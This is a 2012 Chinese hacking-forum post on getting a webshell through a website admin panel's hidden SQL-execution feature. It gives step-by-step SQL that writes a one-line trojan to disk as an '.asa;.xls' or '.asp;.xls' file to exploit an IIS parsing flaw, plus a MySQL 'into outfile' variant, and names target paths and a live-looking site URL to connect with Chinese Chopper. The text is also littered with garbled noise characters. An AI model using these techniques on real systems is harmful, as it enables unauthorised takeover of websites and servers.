好不容易进了后台,发现啥上传啊。备份啊多木有。
4 x( f& _% K2 ~* o2 Cwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
' d( F* U0 T( h( j0 f文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,! B5 }. |" G- d
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
9 i- l7 s" t, p' }; ]6 G( { }$ P1.create table cmd (a varchar(50))
0 r6 v$ k# w7 G$ @ \/ f2.insert into cmd (a) values (‘‘)
: c8 E3 V1 u* p: A0 W, u3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd8 Y5 z' r4 k/ c0 i1 {8 w2 q
(把表cmd的内容导出为物理路径的一个EXCEL文件)& p( v! @# s8 F0 k' b& A
4.drop table cmd2 U0 |/ L# ~0 `( O4 y
利用IIS的BUG成功拿到了WEBSHELL。
: z+ J2 A, r, E; }. B$ W
" l. \: F8 e: | y4 D. Y; g3 Q直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
7 G6 f- d) z _# ^' s, W+ S* P. ^+ r j
SQL语句意思解释:2 w L5 H* W. x) J( V& x; `% i
第一句
, P8 c, _6 c+ h& ^& n0 q# C8 }6 l 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50: f+ h- Z( {/ i ]6 D# d
# N9 b$ M7 I( B% |- X' \2 x! b
第二句+ Z% ?) @4 `# G& H4 k) X! j% x& Y
在表cmd的a字段插入一句话木马
: y" d. L' h* {3 I( a 第三句/ ~: C! q: h0 i6 L+ y
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
' I* ?, U9 r M/ [+ M w8 H
8 D# f+ v7 [+ l! R; F; e 第四句" m" i: F2 r( G1 T& u
删除建立的cmd表
' F# @# p0 P/ y1 K8 O6 B9 W3 X% W: t% n) ^
以下内容为测试:
: Z. v+ Y2 t" i( K, U8 q8 j Access利用后台SQL执行命令功能导出WebShell:
. h8 ?; Y! C; V9 ` 这个更简单:
) n1 Z! }9 v7 Z6 P% S, M, W [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]& H5 ?8 C/ l( T# G/ n1 s6 P9 O
或者9 O5 G$ N. |+ v L* x/ |( @
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]. o% ?! n }* L: i
3 p' c! @- }8 e/ L1 Z' j 后台有执行SQL语句功能(vote为已知表段)
4 c- ?! v$ ^9 x2 b! x 希望对大家有所帮助拿shell的又一个思路7 M8 {9 p% i! I! h! \- h8 l- G
|
发表于 2012-9-13 17:53:58
收藏
支持
反对